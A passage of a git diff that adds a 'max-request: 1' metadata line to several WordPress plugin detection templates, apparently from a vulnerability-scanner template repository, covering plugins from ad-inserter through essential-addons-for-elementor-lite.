http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: 